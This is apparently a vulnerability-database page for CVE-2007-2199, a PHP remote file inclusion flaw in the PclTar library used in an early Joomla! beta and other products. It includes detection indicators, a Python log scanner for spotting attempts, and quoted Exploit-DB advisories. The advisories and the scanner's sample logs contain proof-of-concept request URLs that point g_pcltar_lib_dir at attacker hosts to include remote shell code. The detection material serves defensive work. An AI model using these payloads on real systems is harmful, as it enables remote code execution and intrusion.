CVE-2007-2199
Published 2007-04-24
Priority P3 · 51 · medium · CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit code available (see the Exploit-DB entries below)
EPSS: 46.76% (98.7th percentile)
PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cjg_explorer_pro | cjg_explorer_pro | <= 3.3 | — |
| cjg_explorer_pro | cjg_explorer_pro | — | — |
| joomla | joomla | — | — |
| nx | n_x_wcms | — | — |
| phpsitebackup | phpsitebackup | — | — |
Detection & IOCs (extracted from sources)
- Detect HTTP requests containing the g_pcltar_lib_dir parameter with a remote URL value (http://, https://, ftp:// or another PHP stream wrapper); this is the PHP remote file inclusion vector.
- Monitor GET requests to pcltar.lib.php or pcltrace.lib.php with g_pcltar_lib_dir set to an external URL or to an unexpected path (e.g., g_pcltar_lib_dir=http:// or g_pcltar_lib_dir=shell).
- Monitor GET requests to /libraries/pcl/pcltar.php with g_pcltar_lib_dir containing a URL (e.g., http://hacker/?) in Joomla! 1.5.0 Beta deployments. The trailing "?" in the public PoCs is deliberate: the library appends "/pclerror.lib.php" to the value, and the "?" turns that suffix into a query string so the attacker's URL is fetched as-is.
- The vulnerable include statement builds its path from the parameter: include($g_pcltar_lib_dir."/pclerror.lib.php"); (the Joomla! copy uses "/pclerror.lib.".$g_pcltar_extension). Alert on any user-controlled value reaching this include call.
- Exploitation requires PHP to permit remote URL inclusion: allow_url_fopen on PHP before 5.2.0, allow_url_include on PHP 5.2.0 and later. It also requires the request parameter to reach the plain global $g_pcltar_lib_dir, which happens when register_globals is enabled (off by default since PHP 4.2.0, removed in PHP 5.4.0) or when the including application assigns the global from request data. If register_globals is on but remote inclusion is off, the same unsanitized value is still a local file inclusion vector.
- The vulnerability affects multiple products sharing the same PclTar library: Joomla! 1.5.0 Beta, N/X WCMS 4.5, CJG EXPLORER PRO 3.3, and phpSiteBackup 0.1. Detection rules should cover all known vulnerable paths across these products, including pcltrace.lib.php, which the CJG EXPLORER PRO advisory lists (see CVE-2007-2660, disputed, below).
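The following is an added example, not code from the page's sources or from any of the affected projects. It turns the indicators above into a small log scanner: it parses Apache combined-format access log lines, picks out requests to the PclTar entry points named in the advisories, extracts g_pcltar_lib_dir (decoding a second time to catch double-encoding), classifies the value as a remote include, a local path override or an otherwise suspicious override, and reports the path the vulnerable include would actually open. The log lines are constructed for the example; the list of stream-wrapper schemes and the three-way classification are the author's assumptions, not something the advisories specify.

```python
"""Scan access logs for CVE-2007-2199 (PclTar g_pcltar_lib_dir) inclusion attempts.

Added example, not from the advisories. Input lines are constructed
Apache combined-format records; REMOTE_SCHEMES is an assumption.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# PclTar files named as vulnerable on this page (library copies and the
# Joomla! 1.5.0 Beta copy). Add product-specific paths as needed.
VULN_FILES = ("pcltar.lib.php", "pcltrace.lib.php", "pcltar.php")
PARAM = "g_pcltar_lib_dir"
# Wrappers that include() can open remotely; http/ftp are the classic cases.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def effective_include(value: str) -> str:
    """Path that include($g_pcltar_lib_dir."/pclerror.lib.php") would open.

    A trailing '?' in the attacker's URL turns the appended suffix into a
    query string, which is why the public PoCs end in '?'.
    """
    return value + "/pclerror.lib.php"


def inspect_target(target: str):
    """Return an alert dict if the request target (path plus query) carries a
    g_pcltar_lib_dir override against a PclTar file, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    name = path.rsplit("/", 1)[-1].lower()
    if name not in VULN_FILES:
        return None
    values = parse_qs(parts.query).get(PARAM)
    if not values:
        return None
    # parse_qs already decoded once; a second unquote catches double-encoding.
    value = unquote(values[0])
    lower = value.lower()
    if lower.startswith(REMOTE_SCHEMES):
        kind = "remote_include"
    elif lower.startswith("/") or ".." in lower:
        kind = "local_include"
    else:
        kind = "suspicious_override"
    return {
        "file": name,
        "value": value,
        "kind": kind,
        "effective_include": effective_include(value),
    }


def scan_log(lines):
    """Parse each log line and collect alerts for PclTar inclusion attempts."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = inspect_target(m.group("target"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            alerts.append(hit)
    return alerts


# Constructed sample log (not real traffic). Addresses are documentation ranges.
SAMPLE_LOG = [
    # Shape of the Joomla! 1.5.0 Beta PoC from the advisory above.
    '203.0.113.7 - - [24/Apr/2007:10:01:02 +0000] "GET /libraries/pcl/pcltar.php'
    '?g_pcltar_lib_dir=http://hacker/? HTTP/1.1" 200 512',
    # Shape of the phpSiteBackup PoC, with the scheme double URL-encoded.
    '203.0.113.7 - - [24/Apr/2007:10:01:05 +0000] "GET /phpSiteBackup-0.1/pcltar.lib.php'
    '?g_pcltar_lib_dir=http%253A%252F%252F198.51.100.9%252Fshell.txt%253F HTTP/1.1" 200 77',
    # Directory-traversal override against pcltrace.lib.php (local inclusion).
    '198.51.100.3 - - [24/Apr/2007:10:02:00 +0000] "GET /pcltrace.lib.php'
    '?g_pcltar_lib_dir=../../../../tmp HTTP/1.0" 500 0',
    # Benign traffic.
    '192.0.2.44 - - [24/Apr/2007:10:03:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 8192',
    # Parameter present but not on a PclTar file: not flagged.
    '192.0.2.44 - - [24/Apr/2007:10:03:10 +0000] "GET /index.php?g_pcltar_lib_dir=http://x/ HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["kind"], alert["file"], "->", alert["effective_include"])
```

Run against the sample it reports three alerts (two remote includes, one local override) and ignores the benign lines. In production, feed the real access log and also alert on any 200 response to a direct request for these library files, since PclTar files are never meant to be browsed directly.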
GHSA
GHSA-6f7q-42f8-cprg · CVE-2007-2660 [MEDIUM] · ghsa_unreviewed · 2022-05-01 · CVSS 6.8
** DISPUTED ** PHP remote file inclusion vulnerability in pcltrace.lib.php in the PclTar module in Vincent Blavet PhpConcept Library, as used in CJG EXPLORER PRO 3.3 and earlier and probably other products, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter. NOTE: CVE disputes this issue since there is no include statement in pcltrace.lib.php. NOTE: the pcltar.lib.php vector is already covered by CVE-2007-2199.
GHSA
GHSA-gfmp-6wvc-g9jj · CVE-2007-2199 [MEDIUM] · CWE-94 · ghsa_unreviewed · 2022-05-01
PHP remote file inclusion vulnerability in lib/pcltar.lib.php (same description as CVE-2007-2199 above).
No detection rules found.
Exploit-DB · 2007-06-26 · CVE-2007-2199
PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion
---
# phpSiteBackup 0.1 (pcltar.lib.php) Remote File Include Vulnerability
# D.Script:
http://kent.dl.sourceforge.net/sourceforge/phpsitebackup/phpSiteBackup-0.1.tgz
# Exploit:
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?
# D.Video:
http://my-story.org/uploads/phpSiteBackup.rar
# Discovered by:
GoLd_M = [Mahmood_ali]
# Homepage:
http://www.Tryag.Com/cc
# Greetz To:
Tryag-Team & AsbMay's Group & Crackers_Child & Rf7awy & t0pP8uZz :D
# milw0rm.com [2007-06-26]
Exploit-DB · 2007-05-13 · CVE-2007-2660
CJG EXPLORER PRO 3.2 - 'g_pcltar_lib_dir' Remote File Inclusion
---
#######################S==A==U==D==I#########################
CJG EXPLORER PRO v3.2 (pcltar.lib.php)(pcltrace.lib.php) Remote File Include Vulnerabilities
##############################################################
Found By : Mogatil , [email protected]
##############################################################
Script Site :
http://www.zascom.com/download/PHP/1868-CEP-PHP.ZIP
##############################################################
File : /pcltar.lib.php
include($g_pcltar_lib_dir."/pclerror.lib.php");
File : /pcltrace.lib.php
include($g_pcltar_lib_dir."/pclerror.lib.php");
##############################################################
Thanx: [cold zero] [gawey Al Azary] [crazy man] [scorbion_22]
[the_
Exploit-DB · 2007-04-23 · CVE-2007-2199
Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion
---
Hi,
Joomla! 1.5.0 is in Beta version and "should NOT be used for `live`
or `production` sites."
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesn't
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta :
File /libraries/pcl/pcltar.php, Line 74 :
if (!defined("PCLERROR_LIB"))
{
include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
}
POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?
The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html
- Omid
# milw0rm.com [2007-04-23]
No writeups or analysis indexed.
References
http://osvdb.org/34803
http://osvdb.org/36009
http://secunia.com/advisories/25230
http://www.attrition.org/pipermail/vim/2007-May/001618.html
http://www.hackers.ir/advisories/joomla.html
http://www.securityfocus.com/archive/1/466687/100/0/threaded
http://www.securityfocus.com/archive/1/478503/100/0/threaded
http://www.securityfocus.com/bid/23613
http://www.securityfocus.com/bid/23708
http://www.securityfocus.com/bid/24660
http://www.securityfocus.com/bid/25528
http://www.vupen.com/english/advisories/2007/1511
https://exchange.xforce.ibmcloud.com/vulnerabilities/33837
https://exchange.xforce.ibmcloud.com/vulnerabilities/34273
https://exchange.xforce.ibmcloud.com/vulnerabilities/35092
https://www.exploit-db.com/exploits/3781
https://www.exploit-db.com/exploits/3915
https://www.exploit-db.com/exploits/4111